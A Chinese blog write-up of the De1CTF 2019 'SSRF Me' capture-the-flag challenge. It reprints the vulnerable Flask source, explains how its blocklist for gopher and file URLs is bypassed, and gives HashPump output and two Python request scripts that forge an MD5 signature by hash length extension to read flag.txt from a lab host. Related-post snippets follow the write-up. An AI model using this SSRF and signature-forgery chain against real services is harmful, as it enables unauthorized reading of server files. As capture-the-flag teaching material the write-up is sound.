[De1CTF 2019]SSRF Me

最新推荐文章于 2024-08-25 23:47:35 发布
最新推荐文章于 2024-08-25 23:47:35 发布
阅读量238 收藏 1
点赞数
分类专栏: ssrf hash长度扩展攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41628669/article/details/106091808
版权

知识点

#! /usr/bin/env python 
##encoding=utf-8 
from flask import Flask 
from flask import request 
import socket 
import hashlib 
import urllib 
import sys 
import os 
import json 
reload(sys) 
sys.setdefaultencoding('latin1') 

app = Flask(__name__) 

secert_key = os.urandom(16) 

class Task: 
	def __init__(self, action, param, sign, ip): 
		self.action = action 
		self.param = param 
		self.sign = sign 
		self.sandbox = md5(ip) 
		if(not os.path.exists(self.sandbox)): #SandBox For Remote_Addr 
			os.mkdir(self.sandbox)

	def Exec(self):
		result = {} 
		result['code'] = 500 
		if (self.checkSign()): 
			if "scan" in self.action: 
				tmpfile = open("./%s/result.txt" % self.sandbox, 'w') 
				resp = scan(self.param) 
				if (resp == "Connection Timeout"): 
					result['data'] = resp 
				else: 
					print resp 
					tmpfile.write(resp) 
					tmpfile.close() 
				result['code'] = 200 
			if "read" in self.action: 
				f = open("./%s/result.txt" % self.sandbox, 'r') 
					result['code'] = 200 
					result['data'] = f.read() 
			if result['code'] == 500: 
					result['data'] = "Action Error" 
		else: 
			result['code'] = 500 
			result['msg'] = "Sign Error" 
		return result 

	def checkSign(self): 
		if (getSign(self.action, self.param) == self.sign): 
			return True 
		else: 
			return False 

#generate Sign For Action Scan. 
@app.route("/geneSign", methods=['GET', 'POST']) 

def geneSign(): 
	param = urllib.unquote(request.args.get("param", "")) 
	action = "scan" 
	return getSign(action, param) 

@app.route('/De1ta',methods=['GET','POST']) 
def challenge(): 
	action = urllib.unquote(request.cookies.get("action")) 
	param = urllib.unquote(request.args.get("param", "")) 
	sign = urllib.unquote(request.cookies.get("sign")) 
	ip = request.remote_addr 
	if(waf(param)): 
		return "No Hacker!!!!" 
	task = Task(action, param, sign, ip) 
	return json.dumps(task.Exec()) 
@app.route('/') 
def index(): 
	return open("code.txt","r").read() 
def scan(param): 
	socket.setdefaulttimeout(1) 
	try: 
		return urllib.urlopen(param).read()[:50] 
	except: 
		return "Connection Timeout" 
def getSign(action, param): 
	return hashlib.md5(secert_key + param + action).hexdigest() 
def md5(content): 
	return hashlib.md5(content).hexdigest() 
def waf(param): 
	check=param.strip().lower() 
	if check.startswith("gopher") or check.startswith("file"): 
		return True 
	else: 
		return False 

if __name__ == '__main__': 
	app.debug = False 
	app.run(host='0.0.0.0',port=80)


#获取源码
@app.route('/') 
def index(): 
	return open("code.txt","r").read() 

#返回md5(secret_key + param + action)
@app.route("/geneSign", methods=['GET', 'POST']) 
def geneSign(): 
	param = urllib.unquote(request.args.get("param", "")) 
	action = "scan" 
	return getSign(action, param)
def getSign(action, param): 
	return hashlib.md5(secert_key + param + action).hexdigest()

#从cookie中解析出action和sign,从参数中解析出para,经过waf检验后放入Task类
@app.route('/De1ta',methods=['GET','POST']) 
def challenge(): 
	action = urllib.unquote(request.cookies.get("action")) 
	param = urllib.unquote(request.args.get("param", "")) 
	sign = urllib.unquote(request.cookies.get("sign")) 
	ip = request.remote_addr 
	if(waf(param)): 
		return "No Hacker!!!!" 
	task = Task(action, param, sign, ip) 
	return json.dumps(task.Exec())

#ban掉了ssrf常用的gopher和file
def waf(param): 
	check=param.strip().lower() 
	if check.startswith("gopher") or check.startswith("file"): 
		return True 
	else: 
		return False
  1. 可以不加file,绕过waf,但是服务器解析时会自动添加file
  2. 使用local_file
def Exec(self):
		result = {} 
		result['code'] = 500 
		if (self.checkSign()): 
			if "scan" in self.action: 
				tmpfile = open("./%s/result.txt" % self.sandbox, 'w') 
				resp = scan(self.param) 
				if (resp == "Connection Timeout"): 
					result['data'] = resp 
				else: 
					print resp 
					tmpfile.write(resp) 
					tmpfile.close() 
				result['code'] = 200 
			if "read" in self.action: 
				f = open("./%s/result.txt" % self.sandbox, 'r') 
					result['code'] = 200 
					result['data'] = f.read() 
			if result['code'] == 500: 
					result['data'] = "Action Error" 
		else: 
			result['code'] = 500 
			result['msg'] = "Sign Error" 
		return result 
def scan(param): 
	socket.setdefaulttimeout(1) 
	try: 
		return urllib.urlopen(param).read()[:50] 
	except: 
		return "Connection Timeout"
  1. 先看’scan’字符串在不在传入的action里面
  2. 调用scan函数,使用urlopen远程打开文件,即param参数
  3. 将文件写入result.txt
  4. 如果action里有’read’,则将result.txt的内容放到result[‘data’]中

前提:action里要有read和scan,且能通过md5签名认证
获取flag:将flag.txt读到result.txt中,再进行读取

先获取一个md5(secret_key + flag.txt + scan)

#coding:utf-8
# -*- coding: cp936 -*- 
import requests

url = 'http://93155973-22fe-40f5-ae5d-445a4eb9f993.node3.buuoj.cn/geneSign?param=flag.txt'

cookies = {
	'action':'scan',
	'sign':'sign'
}
r = requests.get(url = url, cookies = cookies)
print(r.text)
#9f403b0981921ba4078528645384004f

secret_key长度为16,源码开头有设置,加上flag.txt的长度8,即为24
使用HashPump进行hash长度拓展

root@kali:/HashPump# ./hashpump 
Input Signature: 9f403b0981921ba4078528645384004f
Input Data: scan
Input Key Length: 24
Input Data to Add: read
93f731d6ed45b861de8d3253ddaf4861
scan\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00read

#coding:utf-8
# -*- coding: cp936 -*- 
import requests

url = 'http://93155973-22fe-40f5-ae5d-445a4eb9f993.node3.buuoj.cn/De1ta?param=flag.txt'

cookies = {
  'sign': '93f731d6ed45b861de8d3253ddaf4861',
  'action': 'scan%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e0%00%00%00%00%00%00%00read',
  }

res = requests.get(url=url, cookies=cookies)
print(res.text)

还是没有明白hash长度拓展攻击的原理
参考浅谈MD5扩展长度攻击

「已注销」
关注
专栏目录
【学习笔记12】buu [De1CTF 2019]SSRF Me
weixin_43553654的博客
05-12 370
打开后看到一堆代码,根本看不懂,不过还好题目上给出了源码的下载位置,并且提示flag is in ./flag.txt,那啥都都不说了,先把源码下载下来吧。 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashl...
[De1CTF 2019]SSRF Me 1
plant1234的博客
04-06 1530
[De1CTF 2019]SSRF Me 1 SSRF概述 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 打
SSRF - 服务器端请求伪造
最新发布
m0_61858762的博客
08-25 937
其形成的原因大都是由于服务端,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。数据流:攻击者----->服务器---->目标地址curl支持很多协议,有FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE以及LDAP。
web buuctf [De1CTF 2019]SSRF Me
weixin_44214568的博客
04-03 1232
打开是一团代码, 整理后: ! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding('latin1') app = Flask(__name__) secert_k
[De1ctf 2019]SSRF Me(哈希拓展攻击)
2301_76690905的博客
01-08 1859
在secret_key + param + action里,已知secert_key = os.urandom(16)(长度16),已知明文flag.txt(param)和scan(action),我们需要添加read。把flag.txt算进秘钥长度里,则秘钥长度为16+8,已知明文为scan,已知hash为8370a8f86a7a74b4053d1bc554a9d126,拓展明文为read,启动刚刚的脚本依次填入得到新明文和新hash,
[De1CTF 2019]SSRF Me(flask框架)
qq_44657899的博客
04-20 2683
题目首先提示了flag的位置,结合题目名字ssrf,可以得到一个大概的思路。 然后打开题目,直接给了源码: #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys im...
[De1CTF 2019]SSRF Me1 解题思路
xiyuanyue的博客
10-10 537
1、/De1ta接口 md5(secert_key +param+action) 生成的sign 等于 接口 /geneSign 的sign md5(secert_key + param + 'scan')1、读取cookie中的action、sign 客户端ip 和 param参数值,当param参数值不是gopher、file绕过waf,初始化类 Task ,然后调用类的exec 方法。构建出来paload 尝试读取/etc/passwd 文件,成功读取/etc/passwd文件内容。
buuctf-[De1CTF 2019]SSRF Me
weixin_43345082的博客
12-30 1099
打开页面就是源码 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefault...
De1ctfSSRF ME多种方法
weixin_44255856的博客
08-09 7352
SSRF Me buuctf有靶场复现地址:http://web68.buuoj.cn/ 出题人给了hint:hint for [SSRF Me]: flag is in ./flag.txt 第一种方法:利用scan方法直接读取flag.txt 打开网页f12获取源码。 #! /usr/bin/env python #encoding=utf-8 from flask import Fla...
De1CTFSSRF Me
迷风小白
08-31 6556
SSRF Me hint:flag is in ./flag.txt 拿到题目打开即是源码 右击查看源码发现是flask写的代码,有一个Task类和三个路由 接下来分析一下三个路由 #generate Sign For Action Scan. @app.route("/geneSign", methods=['GET', 'POST']) def geneSign(): para...
代码审计 | [De1CTF 2019]SSRF Me
crispr的博客
02-09 1817
[De1CTF 2019]SSRF Me 前言 以为是flask模板注入,但是看了其他师傅的writeup后发现是一个代码审计的流程,那就安心审计代码吧。 提示flag在/flag.txt中 整理后代码 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import s...
BUU-WEB-[De1CTF 2019]SSRF Me
qq_24033605的博客
05-16 231
[De1CTF 2019]SSRF Me 页面展示的就是源代码。 可以看出来是python代码,所以应该是flask框架。 (美化一下) #! /usr/bin/env python # #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setd
[De1CTF 2019]SSRF Me | BUUCTF
qq_56313338的博客
09-09 1001
本题有多种解法:拼接字符串或者哈希长度拓展攻击
第四十五题——[De1CTF 2019]SSRF Me
分享简单的安全技术
04-27 523
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,发现源码的乱码,整理后得到python的flask框架的源码,题目提示flag in ./flag.txt #! /usr/bin/env python # #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os
BUUCTF WEB [De1CTF 2019]SSRF Me
A_dmin的博客
12-20 3702
BUUCTF WEB [De1CTF 2019]SSRF Me 不得不说buuctf是个好网站,很多比赛的题目都有复现!! 题目给了源码: #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urlli...
[de1ctf 2019]ssrf me 1
03-16
[de1ctf 2019]ssrf me 1 是一道关于SSRF的题目。它的目标是通过利用SSRF漏洞,访问位于内部网络中的一个HTTP服务,从而获取flag。 具体来说,题目中提供了一个Web应用程序,该应用程序允许用户输入一个URL,然后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值